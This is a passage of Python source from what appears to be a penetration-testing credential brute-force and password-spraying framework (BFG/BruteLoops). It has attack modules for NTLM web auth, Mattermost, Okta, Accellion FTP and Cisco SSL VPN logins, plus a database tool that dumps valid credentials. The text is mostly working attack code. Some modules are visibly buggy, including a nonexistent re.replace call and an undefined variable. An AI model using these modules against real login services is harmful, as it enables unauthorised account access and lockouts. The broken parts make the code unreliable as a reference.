        # Encode the password
        data["user_nameU"]="FEFF;"+";".join([str(v) for v in username.encode('utf')])
        data["passwordU"]="FEFF;"+";".join([str(v) for v in password.encode('utf')])

        resp = sess.post(
                self.auth_url,
                data=data,
                verify=self.verify_ssl,
            )

        # =====================================
        # VERIFY CREDENTIALS AND RETURN OUTCOME
        # =====================================

        if resp.text.find('Logon failed') > -1:
            return dict(outcome=0, username=username, password=password)
        else:
            print(resp.text)
            return dict(outcome=1, username=username, password=password)



import inspect
from functools import wraps
from argparse import (
    Action,
    BooleanOptionalAction,
    ArgumentParser as AP,
    _HelpAction as HA
)

def genParentArg(*args, **kwargs) -> AP:
    '''This function effectively creates a reusable argument object.

    It creates an ArgParse argument using the supplied arguments and
    bind it to an ArgumentParser object with add_help=False.
    '''

    if kwargs.get('action') == 'BoolAction':
        kwargs['action'] = BooleanOptionalAction

    parser = AP(add_help=False)
    parser.add_argument(*args, **kwargs)

    return parser

# =================
# GENERIC ARGUMENTS
# =================

def argument(f):
    '''Read the signature of the decorated function and use the defined
    parameters to produce an argparse.ArgumentParser object that can
    be implemented in the `args` parameter of a BFG module.
    '''

    @wraps(f)
    def wrapper(*name_or_flags, **kwargs):

        if name_or_flags:
            kwargs['name_or_flags'] = name_or_flags

        # =======================================
        # OBTAIN DEFAULTS FROM DECORATED FUNCTION
        # =======================================

        spec = inspect.getfullargspec(f)
        defaults = {
            spec.args[ind]:spec.defaults[ind]
            for ind in range(0,len(spec.args))}
        defaults = defaults | kwargs

        # ==============================================
        # CONSTRUCT AND RETURN THE ArgumentParser OBJECT
        # ==============================================

        return genParentArg(*defaults.get('name_or_flags'), **{
                k:v for k,v in defaults.items()
                if not k.startswith('__') and
                k != 'name_or_flags'})

    return wrapper

def getArgDefaults(f):

    @wraps(f)
    def wrapper(*names, invert=False):
        '''Accept a dictionary of `argparse.ArgumentParser` objects
        organized by string names.

        When a list of `names` is supplied, only argument names in
        that list will be returned.

        Should `names`  be supplied and the `invert` argument is
        `True`, then all parameters that do not appear in `names`
        are returned.
        '''

        # Get the dictionary of default arguments
        dct = f()
    
        if not names:

            # Return all the values
            return list(dct.values())

        else:

            if invert:

                # Get flags that do not appear in the list of names
                names = [f for f in dct.keys() if not f in names]

            values = []

            for flag in names:

                v = dct.get(flag)

                if not v:
                    raise ValueError(
                        f'Unknown argument requested: {flag}')

                values.append(v)

            return values

    return wrapper



import warnings
warnings.filterwarnings('ignore')
import requests
from requests_ntlm import HttpNtlmAuth
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA

class Module(HTTPModule):

    description = 'This module allows one to brute force web ' \
            'applicaitons using basic NTLM authentication.'
    brief_description = 'Generic HTTP basic NTLM authentication'
    args = http_args.getDefaults()
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    @handleUA
    def __call__(self,username,password,*args,**kwargs):
    
        # make the request
        resp = requests.get(self.url,
                    headers=self.headers,
                    verify=self.verify_ssl,
                    proxies=self.proxies,
                    auth=HttpNtlmAuth(
                        username,
                        password
                    )
                )

        # verify credentials and return outcome
        if resp.status_code == 401:
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



from re import search
import requests
import warnings
import urllib
warnings.filterwarnings('ignore')
from bfg.shortcuts.http import HTTPModule, handleUA

'''
# Notes

## Authentication Request

POST /api/v4/users/login HTTP/1.1
Host: mattermost.xxxxxxxxxxx.com
Connection: close
Content-Length: 78
Sec-Fetch-Dest: empty
X-Requested-With: XMLHttpRequest
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.66 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mattermost.xxxxxxxxxxx.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate

{"device_id":"","login_id":"thisis@bhis.com","password":"password","token":""}

## Authentication Response (FAIL)

HTTP/1.1 401 Unauthorized
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 14 Feb 2020 19:43:20 GMT
Content-Type: application/json
Content-Length: 199
Connection: close
Strict-Transport-Security: max-age=63072000
Vary: Accept-Encoding

{"id":"api.user.login.invalid_credentials_email_username","message":"Enter a valid email or username and/or password.","detailed_error":"","request_id":"n69gxwj1spyapey6h4mnxshtgc","status_code":401}
'''

class Module(HTTPModule):

    description = brief_description = 'Mattermost login web interface'
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __call__(self, username, password, *args, **kwargs):

        # Align headers to avoid issues
        if not 'Sec-Fetch-Dest' in self.headers:
            self.headers['Sec-Fetch-Dest'] = 'empty'
        if not 'X-Requested-With' in self.headers:
            self.headers['X-Requested-With'] = 'XMLHttpRequest'
        if not 'Sec-Fetch-Site' in self.headers:
            self.headers['Sec-Fetch-Site'] = 'same-origin'
        if not 'Sec-Fetch-Mode' in self.headers:
            self.headers['Sec-Fetch-Mode'] = 'cors'
        
        data = {
            'device_id':'',
            'login_id':username,
            'password':password,
            'token':'',
        }

        resp = requests.post(
            self.url, json=data, headers=self.headers,
            verify=self.verify_ssl, allow_redirects=False,
            proxies=self.proxies
        )

        if resp.text.find('invalid_credentials') > -1:
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
from re import search
import requests
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA, defaultHTTPArgs

FAIL_VALUE = '"errorCode":"E0000004","errorSummary":"Authentication ' \
        'failed"'

# =================
# MODULE PROPERTIES
# =================

DESCRIPTION = \
'''Brute force credentials for an application configured to use Okta
as an external identity provider. Note that this module will require 
the operator to proxy an authentication request through Burp to get
the artifacts required to support the attack: cookies_url, and 
cookies_referer_url. WARNING: If valid credentials are already
available, testing them through BFG is recommended to ensure
that changes to Okta's authentication process have not broken this
module (things feel complicated).
'''

# ===========
# HELP VALUES
# ===========

URL_HELP = \
'The Okta URL to authenticate to, usually in the form of: ' \
'https://<target>.okta.com/api/v1/authn'

COOKIES_URL_HELP = \
'URL that issues cookies required for authentication. Should be a URL ' \
'like "https://<target>.okta.com/login/login.htm?fromURI=<encoded_param>". ' \
'Authenticate to the application that uses Okta as an identity provider ' \
'while proxying through Burp to identify this value.'

REFERER_URL_HELP = \
'The URL that should be embedded in the HTTP referer header when ' \
'acquiring cookies from the `cookies_url` source. This is the value ' \
'of the referer header found in the same request described in ' \
'`cookies_url`.'



class Module(HTTPModule):

    brief_description = 'Okta JSON API'

    description = DESCRIPTION

    args = [
            http_args.url(help=URL_HELP),
            http_args.url(
                '--cookies-url',
                help=COOKIES_URL_HELP),
            http_args.url(
                '--cookies-referrer-url',
                required=False,
                help=REFERER_URL_HELP,
                default=None),
        ] + \
        http_args.getDefaults('url', invert=True)


    def __post_init__(self, cookies_url, cookies_referrer_url,
            *args, **kwargs):

        self.cookies_url = cookies_url
        self.cookies_referrer_url = cookies_referrer_url

    def __call__(self,username,password,*args,**kwargs):

        # =====
        # NOTES
        # =====
        '''
        - Okta serves as an identity provider
        - Upstream services authenticate users via Okta's services
        - As a web app, the origin service will redirect the user to
          Okta to complete authentication
        - Cursory research suggests the following values are needed
          to authenticate to the application programmatically during
          a brute force attack:
            - The URL which the credentials will be posted to once
              cookies have been obtained
                - Appears to be in the form:
                  https://<target>.okta.com/api/v1/authn
            - Two values that will likely need to be acquired by
              proxying an authentication request through Burp:
              - The URL that is used to issue a valid session token, a
                "cookies_url"
              - The referer header from the request that produced that
                URL, a "cookies_referer_url"
        '''

        # =====================
        # CRAFT THE COOKIES URL
        # =====================
        '''
        - logic crafts the URL used to obtain cookies for authentication
        - first, it splits the username value into a tuple: (username, domain)
        - second, it updates the '{USERNAME}' and '{DOMAIN}' values in the
          cookies_url argument accordingly
        '''

        try:
            # parse the username and domain from the username
            groups = re.search('^(.+)(@|\\\\|/)(.+)',username).groups()

            # update the cookies_url value
            cookies_url = re.replace('{USERNAME}',self.cookies_url,
                    groups[0])
            cookies_url = re.replace('{DOMAIN}',cookies_url,groups[2])
        except Exception as exception:
            return [0, username, password]


        # ==============
        # UPDATE HEADERS
        # ==============
        '''
        - inject user-supplied headers
        - ensure that the cookies_referer_url is always the referer
        '''

        headers = self.headers

        if self.cookies_referer_url:
            headers['Referer'] = cookies_referer_url

        # =============================
        # BUILD SESSION AND GET COOKIES
        # =============================

        session = requests.Session()
        session.get(cookies_url, headers=headers)

        # ===================================
        # BUILD REQUEST DATA AND MAKE REQUEST
        # ===================================
        '''
        - authentication JSON payload is crafted here
        - referer header is updated to match the cookies_url
        '''

        # post data
        data = {
            "password":password,
            "username":username,
            "options":
            {
                "warnBeforePasswordExpired":True,
                "multiOptionalFactorEnroll":True
            }
        }

        # Update headers again. Referer header should match the cookies_url
        headers['referer'] = cookies_url
    
        # make the request
        resp = session.post(self.url,
                json=data,
                headers=headers,
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)

        # ===================================
        # CHECK FOR SUCCESSFUL AUTHENTICATION
        # ===================================
    
        # verify credentials and return outcome
        if resp.status_code == 401 and \
                not re.search(FAIL_VALUE,resp.content):
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



from bruteloops import args as blargs
import argparse

def dump_valid(args, logger, manager):
    '''Write valid credentials to stdout
    '''

    logger.info('Dumping valid credentials')

    credentials = manager.get_valid_credentials() or []

    if len(credentials) == 0:
        logger.info('No valid credentials in database')
        return
    else:
        logger.info(f'Count of valid credentials: {len(credentials)}')

    for r in manager.get_valid_credentials():
        print(f'{r.username.value}:{r.password.value}')

    logger.info('Credentials dumped')

def dump_strict_credentials(args, logger, manager):
    '''Dump strict credentials from the database to stdout
    '''

    logger.info('Dumping static credentials')
    credentials = manager.get_strict_credentials(args.credential_delimiter)

    if len(credentials) == 0:
        logger.info('No static credentials in database')
        return
    else:
        logger.info(f'Count of static credentials: {len(credentials)}')

    for r in credentials:
        print(f'{r.username.value}{args.credential_delimiter}' \
              f'{r.password}')

    logger.info('Strict credentials dumped')

def handle_values(args, logger, manager, associate_spray_values=True):
    '''Insert or delete values from the database.
    '''
    new_args = dict(
        as_credentials = args.as_credentials,
        insert = args.action == 'insert',
        associate_spray_values = associate_spray_values)

    for handle in ['usernames','passwords','credentials',
            'username_files','password_files','credential_files',
            'csv_files']:
        if hasattr(args,handle): new_args[handle] = getattr(args,handle) 

    manager.manage_db_values(**new_args, logger=logger)

def prioritize_values(args, logger, manager):
    '''Prioritize or unprioritize values
    '''

    new_args = {'prioritize':args.prioritize}

    for handle in ['usernames','passwords']:
        if hasattr(args,handle): new_args[handle] = getattr(args,handle)

    manager.manage_priorities(**new_args)

def disable_usernames(args, logger, manager):

    logger.info(f'Disabling usernames: {args.usernames}')
    manager.disable_username_records(container=args.usernames)

def enable_usernames(args, logger, manager):

    logger.info(f'Enabling usernames: {args.usernames}')
    manager.enable_username_records(container=args.usernames)

def associate_spray_values(args, logger, manager):

    logger.info(f'Associating spray values')
    manager.associate_spray_values()

db_flag = argparse.ArgumentParser()
db_flag.add_argument('--database', '-db', help='Database to target.',
    required=True)

# Default parser
parser = argparse.ArgumentParser(
        description='Manage BruteLoops input databases',
        add_help=False)

parser.set_defaults(cmd=handle_values,action=None)
subparsers = parser.add_subparsers(
        title='Database Management',
        description='Manage the attack database.',
        help='Subcommands:')

# =================================
# DUMP VALID CREDENTIALS SUBCOMMAND
# =================================

parser_dump_valid = subparsers.add_parser('dump-valid',
        description='Dump valid credentials from the database',
        help='Dump valid credentials from the database',
        parents=[db_flag],
        add_help=False)
parser_dump_valid.set_defaults(cmd=dump_valid)

# ==================================
# DUMP STRICT CREDENTIALS SUBCOMMAND
# ==================================

parser_dump_strict_credentials = subparsers.add_parser(
        'dump-credential-values',
        description=('Dump scrict credentials, regardless of '
                'of status from the database. This is a mean'
                's of identifying which static values have b'
                'een imported and can be used to obtain a li'
                'st of values to be deleted from the attack.'
                ' Use the dump_valid subcommand to dump vali'
                'values, including strict records, from the '
                'database.'),
        help='Dump all credential values from the database.',
        parents=[db_flag],
        add_help=False)

# ========================
# IMPORT VALUES SUBCOMMAND
# ========================

parser_import_values = subparsers.add_parser('import-spray-values',
            description=('Import username and password values '
                    'into the target database. NOTE: if crede'
                    'ntial inputs are provided, they will be '
                    'split into individual username and passw'
                    'ord values and imported for spraying. Us'
                    'the import-credentials subommand if you '
                    'wish to import individual credentials th'
                    'at will be paired individualy in the dat'
                    'base.'),
            help='Import values into the target database',
            parents=[db_flag, blargs.input_parser,blargs.credential_parser],
            add_help=False)
parser_import_values.set_defaults(as_credentials=False, action='insert')

# =============================
# IMPORT CREDENTIALS SUBCOMMAND
# =============================
# TODO: TEST ME

parser_import_credentials = subparsers.add_parser(
        'import-credential-values',
        description=('Import credential values into the target'
                ' database. The username to password relations'
                'hip is maintained in the data meaning t'
                'hat individual guesses for the username to p'
                'assword combination will be scheduled. No ad'
                'ditional guesses will be made for the userna'
                'me and the password will not be used for gue'
                'sses targeting other usernames.'),
        help='Import credential pairs into the target database',
        parents=[db_flag, blargs.credential_parser],
        add_help=False)
parser_import_credentials.set_defaults(as_credentials=True,
        action='insert')

# ========================
# DELETE VALUES SUBCOMMAND
# ========================
# TODO: TEST ME; PAY ATTENTION TO CASCADING DELETIONS

parser_delete_values = subparsers.add_parser('delete-spray-values',
            description='Delete username and password values '
                    'from the target database. NOTE: if crede'
                    'ntials are supplied, then the username a'
                    'nd password values are removed from the '
                    'database entirely. Use the delete-creden'
                    'tials subcommand if you wish to delete c'
                    'redential records',
            help='Delete values from the target database',
            parents=[db_flag,blargs.input_parser,blargs.credential_parser],
            add_help=False)
parser_delete_values.set_defaults(as_credentials=False, action='delete')

# =============================
# DELETE CREDENTIALS SUBCOMMAND
# =============================
# TODO: TEST ME
parser_delete_credentials = subparsers.add_parser(
        'delete-credential-values',
        description=('Delete credential values from the target'
                'database. This targets password to username '
                'relationships, but a given username or passw'
                'will be removed from the database entirely s'
                'hould either no longer be associated with fu'
                'ture guesses after the associations have bee'
                'n removed'),
        help='Delete credential pairs from the target database',
        parents=[db_flag, blargs.credential_parser],
        add_help=False)
parser_delete_credentials.set_defaults(as_credentials=True,
        action='delete')

# ============================
# PRIORITIZE VALUES SUBCOMMAND
# ============================

parser_prioritize_values = subparsers.add_parser(
        'prioritize-values',
        description='Prioritize username/password values',
        help='Prioritize username/password values',
        parents=[db_flag, blargs.stp],
        add_help=False)
parser_prioritize_values.set_defaults(
        cmd=prioritize_values)

# ==================================
# DISABLE USERNAME VALUES SUBCOMMAND
# ==================================

parser_disable_usernames = subparsers.add_parser(
    'disable-usernames',
    description='Disable usernames, removing them from further'
        'guesses.',
    help='Stop guessing of target usernames.',
    parents=[db_flag],
    add_help=False)
parser_disable_usernames.set_defaults(cmd=disable_usernames)

parser_disable_usernames.add_argument('--usernames', '-u',
    help='Usernames to disable.',
    required=True,
    nargs='+')

# =================================
# ENABLE USERNAME VALUES SUBCOMMAND
# =================================

parser_enable_usernames = subparsers.add_parser(
    'enable-usernames',
    description='Enable usernames, allowing them to be targeted'
        'guesses.',
    help='Resume guessing of target usernames.',
    parents=[db_flag],
    add_help=False)
parser_enable_usernames.set_defaults(cmd=enable_usernames)

parser_enable_usernames.add_argument('--usernames', '-u',
    help='Usernames to enable.',
    required=True,
    nargs='+')





#!/usr/bin/env python3

import requests
import re
import warnings
from bfg.args import http as http_args, argument
from bfg.shortcuts.http import HTTPModule, handleUA
warnings.filterwarnings('ignore')

'''
# Notes

## Example Post Payload

The `fc` parameter is a value embedded from initial resolution of
the DEFAULT_LANDING. Must be parsed accordingly.

```
user=testo%40wc.com&password=presto&fc=w418-O1LolQa3sNuhib5s18kwLD33f7f3YulC0B3cftanOcg%5E
```

Input field from the landing HTML

<input type="hidden" id="flogin" name="flogin" value="w418-O1LolQa3sNuhib5s18kwLD33f7f3YulC0B3cftanOcg^">

## Invalid Credential Response

```
0||1||Invalid Username/Password.
```
'''

# Default user agent
DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' \
             'AppleWebKit/537.36 (KHTML, like Gecko) Chr' \
             'ome/58.0.3029.110 Safari/537.36'

# Path to default landing page
#   - Assigns CRSF cookie
#   - Provides value to fc POST parameter (unknown use)
DEFAULT_LANDING = '/courier/web/1000@/wmLogin.html?'

# Path to where the form is posted
DEFAULT_LOGIN   = '/courier/web/1000@/wmUtils.api'

RE_FLOGIN = re.compile('name="flogin" value="(?P<flogin>.+)"><input '\
        'type="hidden" id="logRes"')

@argument
def landing_path(name_or_flags=('--landing-path',),
        default=DEFAULT_LANDING,
        help='String path to the landing page that issues '
            'cookies/tokens.'):
    pass

@argument
def login_path(name_or_flags=('--login-path',), default=DEFAULT_LOGIN,
        help='String path to where the authentication form '
            'is to be submitted.'):
    pass

@argument
def url(name_or_flags=('--url',),
        required=True,
        help='Origin server which --landing-path and --login-path '
                'will be suffixed to. Expected format: '
                'https://www.target.com'):
    pass

class Module(HTTPModule):
    '''Callable FTP class for the Accellion FTP web interface.
    '''

    description = brief_description = 'Accellion FTP HTTP interface login module'

    args = [url(), login_path(), landing_path()]+\
        http_args.getDefaults('url', invert=True)

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __post_init__(self, landing_path, login_path, *args, **kwargs):

        self.origin_url=self.url
        self.landing_path=landing_path
        self.login_path=login_path
        self.landing_url=f'{origin_url}{landing_path}'
        self.auth_url=f'{origin_url}{login_path}'

    @handleUA
    def __call__(self, username, password):
        '''Authentication module called for each set of credentials.
        It uses a fresh `requests.Session` object to acquire a new
        session cookie and fc value from the landing page to assure
        that server-side logic doesn't denylist a given combination of
        values due to multiple failed authentication attempts.

        - username - String username value to guess
        - password - String password value to guess
        '''

        # ====================
        # GET NECESSARY VALUES
        # ====================

        sess = requests.Session()

        # Get a CSRF-TOKEN (cookie)
        resp = sess.get(self.landing_url,self.headers)

        if resp.status_code != 200:
            raise Exception(
                    f'Server responded with non 200: {resp.status_code}')

        # Get the flogin line from the response text content
        target=None
        for line in resp.text.split('\n'):
            if line.find('name="flogin"') > 0:
                target=line
                break

        # Get the fc value for the POST request
        if target: match = re.search(RE_FLOGIN,target)

        if target == None or match == None:
            raise Exception(
                    'Failed to acquire flogin token from response body')

        # ======================
        # ATTEMPT AUTHENTICATION
        # ======================

        resp = sess.post(
                self.auth_url,
                data={'username':username,
                    'password':password,
                    'fc':match.groups()[0]},
                headers={
                        'Referer':self.landing_url,
                        'CSRF-TOKEN':resp.cookies['CSRF-TOKEN'],
                    },
                verify=self.verify_ssl
            )

        if 'Content-Type' not in resp.headers or \
                resp.headers['Content-Type'].find('text') == -1:
            raise Exception(
                    'Unknown response after authentication attempt')

        # =====================================
        # VERIFY CREDENTIALS AND RETURN OUTCOME
        # =====================================

        if resp.text.find('Invalid') > -1:
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



# Variables containing data values from the datasets directory. To
# avoid unneccessarily loading the datasets, loader functions are
# made available. Call loader functions to populate the variables.

from pathlib import Path

DATASETS_PATH = Path(__file__).parent / 'datasets'
USER_AGENT_STRINGS = UAS = []

# =========================================
# LOAD THE AZURE SSO SOAP FILE INTO MEMEORY
# =========================================

AZURE_SSO_SOAP_FILE = DATASETS_PATH / 'azure_sso_soap.xml'

def loadAzureSSOSoap(path:str=None, force=False) -> None:


    path = Path(path) if path else AZURE_SSO_SOAP_FILE

    with AZURE_SSO_SOAP_FILE.open() as f:
        return f.read()

# ================
# LOAD USER AGENTS
# ================

def loadUserAgents(path:str=None, force=False) -> None:
    '''Load user agent strings from the datasets directory into
    the USER_AGENT_STRINGS module variable.

    Args:
        path: Full path to the file that should be imported. If None,
            the default, then the datasets directory will be derived
            from the module path and the file "ua_strings.txt" will
            be loaded.

    Raises:
        FileNotFound error when an invalid path is supplied.
    '''

    if UAS and not force:
        return

    path = Path(path) if path else DATASETS_PATH / 'ua_strings.txt'

    if not path.exists():

        raise FileNotFoundError(
            'Source for user agent strings source was not found: ' +
            str(path))

    with path.open() as infile:

        c = 0
        for l in infile:
            l = l.strip()
            if not l in UAS:
                c += 1
                UAS.append(l)



#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
import re
import requests
from bfg.args import http as http_args, argument
from bfg.shortcuts.http import HTTPModule, handleUA, defaultHTTPArgs
from lxml.html import document_fromstring as parse_html

SUCCESS_REGS = [
    re.compile('SSL VPN Service'),
    re.compile('webvpn_logout', re.I),
]
URL_PATH='/+webvpn+/index.html'
GROUPS_PATH='/+CSCOE+/logon.html'

# =================
# MODULE PROPERTIES
# =================

DESCRIPTION = \
'''
Brute force the Cisco SSL VPN web interface.
'''

@argument
def path(name_or_flags=('--path',),
        default=URL_PATH,
        help='Path that is suffixed to the base URL, e.g. '
            'https://somehost.com becomes https://somehost'
            '.com%(default)s. Default: %(default)s'):
    pass

@argument
def groups(name_or_flags=('--groups',),
        nargs='+',
        help='Group values to target. These can usually be found '
            'at the "/+CSCOE+/logon.html" resource by rendering it '
            'and searching for <option> elements in the page\'s '
            'source. Group names or option values can be supplied. '
            'NOTE: Supply "BRUTE_ALL" to this config to target all '
            'groups. BRUTE_ALL COULD LOCK ACCOUNTS!!! '
            'Required: %(required)s'):
    pass

@argument
def groups_path(name_or_flags=('--groups-path',),
        default=GROUPS_PATH,
        help='Path that lists groups in HTML source code. Default: '
         '%(default)s'):
    pass

class Module(HTTPModule):

    brief_description = description = DESCRIPTION

    args = [
            groups(),
            path(),
            groups_path(),
        ] + \
        http_args.getDefaults()

    contributors = [
        dict(
            name='Justin Angel [Module Creator]',
            additional=dict(
                company='Black Hills Information Security',
                twitter='@ImposterKeanu')),
        dict(
            name='Corey Ham',
            additional=dict(
                company='Black Hills Information Security')),
        dict(
            name='Steve Borosh',
            additional=dict(
                company='Black Hills Information Security',
                twitter='@rvrsh3ll')),
    ]

    references = [
        'https://github.com/rapid7/metasploit-framework/blob/47fcf541e' \
        '332e8be7a71ce41738be712a29071ee/modules/auxiliary/scanner/htt' \
        'p/cisco_ssl_vpn.rb#L1'
    ]

    def __post_init__(self, path:str, groups_path:str, groups:list,
            *args, **kwargs):
        '''Set non-standard instance attributes and acquire the groups
        listing from the SSL VPN's landing page.

        Args:
            path: URL path to send credentials to.
            groups_path: URL path where group values are listed.
            groups: A list of group strings to target for brute
                forcing.
        '''

        self.path = path
        self.groups_path = groups_path
        self.groups = groups

        # ============================================
        # REQUEST AND EXTRACT GROUPS FROM LANDING PAGE
        # ============================================

        try:

            resp = requests.get(
                self.url+self.groups_path,
                verify=self.verify_ssl,
                headers=self.headers,
                proxies=self.proxies,
                allow_redirects=False)

        except Exception as e:

            raise Exception(
                'Failed to make initial request to obtain '
                f'a listing of group values: {e}')

        # Parse the response body into an LXML object
        try:
            ele = parse_html(resp.text)
        except Exception as e:
            raise Exception(
                'Failed to parse HTML from initial response: {e}')

        # Query out the group_list
        group_list = ele.get_element_by_id('group_list')
        if not group_list:
            raise Exception(
                'Failed to extract group listing from initial '
                'request.')

        # Gather each option value
        groups = list()
        if self.groups is not None:

            for opt in group_list:
    
                value = opt.get('value')
                text = opt.text
    
                if (opt.tag != 'option') or not (value and text):
                    # Skip non-option/empty elements.
                    continue
    
                if 'BRUTE_ALL' in self.groups:
                    # Capture all groups when "BRUTE_ALL" is supplied.
                    groups.append(value)
    
                elif (text in self.groups) or (value in self.groups):
                    # Capture the value when it's specified.
                    groups.append(value)
    
            self.groups = groups

        else:

            self.groups = groups

    def gen_payload(self, username:str, password:str,
            group:str=None) -> dict:
        '''Generate the standard POST payload for the request.

        Args:
            username: Username value.
            password: Pasword value.
            group: Group to target.

        Returns:
            dict POST payload.
        '''

        payload = dict(
            tgroup='',
            next='',
            tgcookieset='',
            password=password,
            username=username,
            Login='Logon')

        if group:
            payload['groups_list'] = group

        return payload

    def send_and_check(self, username:str, password:str,
            group:str=None) -> dict:
        '''Send the request and validate the response.

        Args:
            username: Username value.
            password: Password value.
            group: Group to target.

        Returns:
            dict outcome structure.
        '''

        # =============================
        # BUILD SESSION AND GET COOKIES
        # =============================

        session = requests.Session()
        session.get(self.url,
            headers=self.headers,
            verify=self.verify_ssl,
            allow_redirects=False,
            proxies=self.proxies)

        # ===================================
        # CHECK FOR SUCCESSFUL AUTHENTICATION
        # ===================================
    
        # make the request
        resp = session.post(self.url+self.path,
                data=self.gen_payload(
                    username=username,
                    password=password,
                    group=group),
                headers=self.headers,
                verify=self.verify_ssl,
                allow_redirects=self.allow_redirects,
                proxies=self.proxies)

        # Output from execution
        out = dict(
            outcome=0,
            username=username,
            password=password)

        # verify credentials and return outcome
        if resp.status_code == 200 and \
                SUCCESS_REGS[0].search(resp.text) and \
                SUCCESS_REGS[1].search(resp.text):
            out['outcome'] = 1

        return out

    @handleUA
    def __call__(self, username, password, *args, **kwargs):
        '''Call the module.
        '''

        try:

            if not self.groups:
    
                # =====================
                # GUESS WITHOUT A GROUP
                # =====================
    
                return self.send_and_check(username, password)
    
            else:

                # ====================
                # GUESS FOR EACH GROUP
                # ====================
    
                for group in self.groups:
    
                    out = self.send_and_check(username, password, group)
    
                    if out['outcome'] == 1:

                        # Add a log event communicating the group
                        # since the database doesn't have a field
                        # have a field to track that value
                        out['events'] = [
                            (
                                'Valid (<username>:<group>:<password>): '
                                f'{username}:{group}:{password}'
                            )
                        ]
    
                        # Return when successful authentication occurs
                        return out

        except Exception as e:

            return dict(
                outcome=-1, username=username, password=password,
                events=[str(e)])

